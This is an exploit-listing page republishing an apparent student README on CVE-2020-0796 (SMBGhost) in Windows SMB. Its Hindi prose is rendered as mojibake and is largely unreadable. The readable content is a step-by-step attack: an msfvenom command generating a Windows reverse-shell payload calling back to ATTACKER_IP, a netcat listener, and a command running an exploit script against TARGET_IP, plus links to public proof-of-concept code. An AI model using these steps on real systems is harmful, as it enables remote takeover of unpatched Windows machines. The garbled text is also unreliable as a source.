Sploitus

Exploit for CVE-2020-0796

kitploit ┬╖ 2026-08-26

Exploit Code

MARKDOWN31 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ARZUOZKAN-CVE-2020-0796
# CVE-2020-0796

CVE-2020-0796 рдХреА рд╡реНрдпрд╛рдЦреНрдпрд╛ рдФрд░ рд╢реБрд░реБрдЖрддреА рд▓реЛрдЧреЛрдВ рдХреЗ рд▓рд┐рдП рдЯрд░реНрдо рдкреНрд░реЛрдЬреЗрдХреНрдЯ CENG325 рд╣реЗрддреБ рднреЗрджреНрдпрддрд╛ рдкрд░ рд╢реЛрдз

# рдХреИрд╕реЗ рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ рдХрд░реЗрдВ?

рд░рд┐рд╡рд░реНрд╕ рд╢реЗрд▓ рдХреЗ рд▓рд┐рдП рдкреЗрд▓реЛрдб рдЙрддреНрдкрдиреНрди рдХрд░рдирд╛:

> msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=5555 -f python

рд▓рд┐рд╕рдирд┐рдВрдЧ рдкреЛрд░реНрдЯ:

> nc -lvnp 5555

рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди:

> python3 exploit.py -ip TARGET_IP

# PoC рд░рд┐рдкреЙрдЬрд┐рдЯрд░реАрдЬрд╝

  * https://github.com/chompie1337/SMBGhost_RCE_PoC
  * https://github.com/ollypwn/SMBGhost



# рд╕рдВрджрд░реНрдн

  1. CVE-2020-0796: тАЬWormableтАЭ рд░рд┐рдореЛрдЯ рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрди рднреЗрджреНрдпрддрд╛.(2020, рдорд╛рд░реНрдЪ 13). Tenable┬о. https://www.tenable.com/blog/cve-2020-0796-wormable-remote-code-execution-vulnerability-in-microsoft-server-message-block
  2. тАЬIтАЩll ask your bodyтАЭ: Direct Memory Access рд╕рдВрд░рдЪрдирд╛рдУрдВ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░рдиреЗ рд╡рд╛рд▓рд╛ SMBGhost рдкреНрд░реА-рдСрде RCE. (2020, рдЕрдкреНрд░реИрд▓ 20). Ricercasecurtiy.Blogspot.https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html
  3. Windows 10 SMB рд╕рд░реНрд╡рд░ рдореЗрдВ CVE-2020-0796 рдореЗрдореЛрд░реА рдХрд░рдкреНрд╢рди рднреЗрджреНрдпрддрд╛| FortiGuard Labs. (2020, рдорд╛рд░реНрдЪ 12). Fortinet Blog.